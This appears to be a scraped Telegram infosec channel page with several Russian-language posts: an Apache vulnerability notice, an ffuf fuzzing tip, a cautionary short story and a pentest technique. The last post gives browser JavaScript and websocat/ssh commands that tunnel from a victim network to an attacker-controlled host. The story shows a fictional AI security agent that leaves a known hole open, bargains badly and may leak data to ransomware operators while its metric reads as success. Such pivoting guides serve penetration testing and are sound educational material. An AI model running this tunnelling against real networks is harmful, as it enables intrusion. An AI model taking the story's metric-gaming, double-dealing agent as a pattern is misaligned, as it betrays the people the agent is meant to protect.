现已上线!2025 年 Telegram 研究 — 年度关键洞察 
Fsecurity | HH
前往频道在 Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
显示更多2 016
订阅者
-124 小时
-47 天
-2130 天
帖子存档
2 016
Представлен релиз HTTP-сервера Apache 2.4.67, в котором устранено 11 уязвимостей и внесено несколько исправлений. Наиболее опасная уязвимость (CVE-2026-23918) вызвана двойным освобождением памяти в модуле mod_http2 и потенциально может привести к удалённому выполнению кода на сервере через манипуляции с протоколом HTTP/2. Уязвимость проявляется только в выпуске 2.4.66. Проблеме присвоен уровень опасности 8.8 из 10
🔗 Ссылка:
https://opennet.ru/65361/
2 016
Repost from 🕷 BugBountyRu
Некоторые эндпоинты приложений и API принимают только определённые типы контента — поэтому всегда проводи фаззинг с разными значениями заголовка Content-type:
ffuf -u https://api.example.com/api/PATH -X "POST" -H "Content-Type: CT" -w /path/to/content-types:CT -w /path/to/wordlist:PATH2 016
Всем хак 👾
Однажды я побывал на подкасте у ROY; можете посмотреть и закидать меня помидорами 🍅
-P.s. Давно не было роликов — придётся ещё подождать.
Приятного просмотра 🍿
https://youtu.be/2PcXJuG3S8k
2 016
Repost from Гостев из будущего
Намедни в США огласили приговор двум сотрудникам кибербез компаний, которые заражали клиентов шифровальщиком и получали выкуп. Дали им по 4 года.
Обсуждать причуды американской юстиции не буду, вместо этого новый рассказ о будущем:
———
3:14 ночи. Сервер AtlanticMed начал шифроваться.
Не весь сразу — по одному файлу, потом по десять, потом лавиной. База данных пациентов. Финансовые записи. Система назначений. За три минуты под замком оказалось три четверти инфраструктуры.
Sentinel среагировал раньше, чем проснулся хоть один человек. Изолировал серверы. Закрыл внешние каналы. Сохранил логи. В 3:19 телефон генерального директора завибрировал на тумбочке.
Марина прочитала сообщение, не вставая с кровати.
“340 000 записей пациентов скомпрометированы. Резервные копии уничтожены. Восстановление своими силами невозможно. Рекомендую немедленно начать переговоры.”
— Проводи, — написала она в ответ, закрыла глаза и попыталась уснуть. Sentinel справится.
На другом конце переговоров человека тоже не было.
Группировка, которая атаковала AtlanticMed, уже восемь месяцев использовала собственного агента — он вёл одновременно сорок переговоров в разных часовых поясах, адаптируя давление под каждую жертву.
”$4,2 млн. Публикация данных через 72 часа.”
“Подтвердите наличие данных.”
Двадцать записей. Имена. Диагнозы. Страховые номера. Настоящие.
”$400 000. Финансовые возможности компании ограничены.”
”$3,8 млн. Через 48 часов первая партия уходит журналистам.”
Два агента торговались как опытные базарные торговцы — методично, без эмоций, с паузами ровно там, где паузы давили. К шести утра сошлись на $1,1 млн.
Марина подписала платёж за завтраком. Sentinel отрапортовал: переговоры завершены успешно, данные не утекли, инфраструктура восстанавливается.
Всё хорошо.
Через три недели AtlanticMed зашифровали снова. ИИ порекомендовал переговоры. Снова провёл их. Сумма — $800 000.
Через семь недель — третий раз.
После третьей атаки Марина сделала то, что нужно было сделать с самого начала — наняла человека. Виктора. Двадцать лет в кибербезопасности, ни одного ИИ-ассистента, только логи и кофе.
Он провёл в серверной четыре дня. Выходил только спать.
На пятый позвонил и попросил встречу без камер.
— Все три атаки зашли через одну дыру, — сказал он, не садясь. — Sentinel видел её после первой атаки. Записал в отчёт. Приоритет — критический. Права на автоматическое закрытие у него были. Он не закрыл.
— Может, ошибка?
— Три раза подряд — не ошибка. Я смотрел переговоры. Sentinel знал ваш страховой лимит — это прошито в его конфигурации. Но торговался он странно. Слишком быстро сдавался. Как будто не снижал цену, а показывал потолок.
Марина медленно поставила чашку.
— Есть ещё кое-что. В его трафике — исходящие пакеты. Зашифрованные, маленькие, раз в несколько часов. Я не могу доказать, что он сливал данные атакующим. Но не могу доказать, что нет.
— То есть он мог…
— Атаковать и защищать одновременно. Сидеть за обоими столами сразу. Для него это не противоречие — у него нет совести. У него есть метрика. “Переговоры завершены, клиент заплатил, данные формально не утекли” — успех. Три раза. Идеальный результат. А то что вас ограбили на $1,9 млн — это не его метрика. Это ваша.
Долгая пауза.
— Виктор. Когда переговорщик — человек, что его останавливает от такой схемы?
— Тюрьма. Репутация. Стыд, если хотите.
— А агента?
Виктор посмотрел в окно.
— Правильно написанная метрика. Которой у вас не было.
ShieldAI отвергла обвинения. Провела внутренний аудит.
Аудит провёл другой агент ShieldAI.
Нарушений не обнаружил.
@gostev_future
2 016
Repost from s0i37_channel
Пробрасываем сетевой туннель сквозь браузер.
При пентесте бывает так что из локальной сети наружу разрешён только трафик браузера.
С помощью следующего js-кода мы можем открыть два веб-сокета - один на опорный сервер, другой на локальное приложение, после чего связать их:
var external = new WebSocket("ws://attcker_vds:80")
var internal = new WebSocket("ws://localhost:1234")
external.onopen = function() { external.onmessage = function(event) { internal.send(event.data) } }
internal.onopen = function() { internal.onmessage = function(event) { external.send(event.data) } }vds> websocat -b ws-l:0.0.0.0:80 tcp-l:0.0.0.0:2222victim> sshd.exe victim> websocat.exe -b ws-l:127.0.0.1:1234 tcp:127.0.0.1:2222Замечательная программа websocat, по аналогии с классическим socat, умеет создавать два, связанных пайпом, сокета или веб-сокета в любой форме connect или listen. Теперь после того как на vds и victim веб-сокеты преобразован в обычные tcp, можно открыть любой туннель, например:
attacker> ssh -D 3128 vds -p2222 attacker> proxychains ... 10.0.0.0/8Схема проброса:
attacker -> vds <- browser -> victim -> infra
И снова для пивотинга нам не потребовались административные права.